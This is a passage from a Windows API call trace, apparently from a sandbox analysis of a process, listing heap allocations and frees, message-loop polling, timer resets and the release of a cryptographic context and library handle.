(in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0241.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0241.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0241.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0241.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0241.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0241.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f4b8 | out: hHeap=0x970000) returned 1 [0241.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0241.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0241.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0241.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0241.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0241.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0241.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0241.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0241.813] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0241.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0241.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0241.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0241.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0241.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0241.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f828 [0241.813] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0241.813] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0241.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5a8 | out: hHeap=0x970000) returned 1 [0241.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0241.814] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0241.814] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0241.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04620 | out: hHeap=0x970000) returned 1 [0241.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0241.814] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0241.814] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0241.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0241.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0241.814] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0241.814] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0241.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04540 | out: hHeap=0x970000) returned 1 [0241.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0241.815] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0241.815] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0241.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0241.815] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0241.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0241.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0241.815] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0241.815] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0241.815] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0241.815] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0241.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f670 | out: hHeap=0x970000) returned 1 [0241.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0241.816] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0241.816] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0241.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04348 | out: hHeap=0x970000) returned 1 [0241.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0241.816] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0241.816] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0241.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0241.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0241.816] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0241.816] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0241.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04150 | out: hHeap=0x970000) returned 1 [0241.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0241.816] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0241.817] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0241.817] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0241.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04268 | out: hHeap=0x970000) returned 1 [0241.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0241.817] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0241.817] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0241.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f418 | out: hHeap=0x970000) returned 1 [0241.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0241.817] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0241.817] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0241.817] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0241.817] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69b28, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0241.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0241.818] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0241.818] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0241.818] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0241.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04348 | out: hHeap=0x970000) returned 1 [0241.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0241.818] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0241.818] FreeLibrary (hLibModule=0x756e0000) returned 1 [0241.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0241.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0241.818] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0241.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0241.818] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0241.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0241.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0241.818] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0241.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0241.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0241.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0241.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0241.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0241.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0241.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0241.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0241.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0241.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e30 [0241.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50da0 [0241.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50fb0 [0241.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0241.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ea8 [0241.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f490 [0241.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0241.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50de8 [0241.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0241.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0241.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0241.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0241.819] CloseHandle (hObject=0x2d0) returned 1 [0241.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0241.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0241.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0dd0 | out: hHeap=0x970000) returned 1 [0241.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0241.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0241.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0241.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0241.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0241.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0241.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0241.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0241.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0241.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0241.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f490 | out: hHeap=0x970000) returned 1 [0241.823] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0241.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0241.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0241.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0241.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0241.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0241.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0241.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0241.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0241.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0241.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d28 [0241.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f80 [0241.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d40 [0241.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0241.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f38 [0241.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3c8 [0241.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0241.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50de8 [0241.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0241.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0241.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0241.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0241.860] CloseHandle (hObject=0x2a0) returned 1 [0241.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0241.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0241.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04810 | out: hHeap=0x970000) returned 1 [0241.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0241.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0241.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0241.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0241.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0241.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0241.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0241.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0241.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0241.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0241.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3c8 | out: hHeap=0x970000) returned 1 [0241.865] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 1 [0241.865] TranslateMessage (lpMsg=0x8cf708) returned 0 [0241.865] DispatchMessageW (lpMsg=0x8cf708) returned 0x0 [0241.865] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0241.865] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0241.865] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0241.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0241.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0241.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0241.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0241.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0241.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0241.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0241.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0241.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0241.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0241.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0241.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0241.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0241.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0241.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0241.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0241.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0241.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ee6748 | out: hHeap=0x970000) returned 1 [0241.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0241.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0241.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f468 | out: hHeap=0x970000) returned 1 [0241.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0241.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f800 | out: hHeap=0x970000) returned 1 [0241.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0241.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0241.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0241.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f580 | out: hHeap=0x970000) returned 1 [0241.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0241.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50428 | out: hHeap=0x970000) returned 1 [0241.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0241.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f508 | out: hHeap=0x970000) returned 1 [0241.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0241.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f350 | out: hHeap=0x970000) returned 1 [0241.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0241.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6e8 | out: hHeap=0x970000) returned 1 [0241.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0241.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3f0 | out: hHeap=0x970000) returned 1 [0241.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0241.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f648 | out: hHeap=0x970000) returned 1 [0241.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0241.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0241.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0241.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f440 | out: hHeap=0x970000) returned 1 [0241.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503c8 | out: hHeap=0x970000) returned 1 [0241.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0241.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f045e8 | out: hHeap=0x970000) returned 1 [0241.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0241.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6c0 | out: hHeap=0x970000) returned 1 [0241.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50560 | out: hHeap=0x970000) returned 1 [0241.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50500 | out: hHeap=0x970000) returned 1 [0241.868] HeapFree (in: hHeap=0x970000, 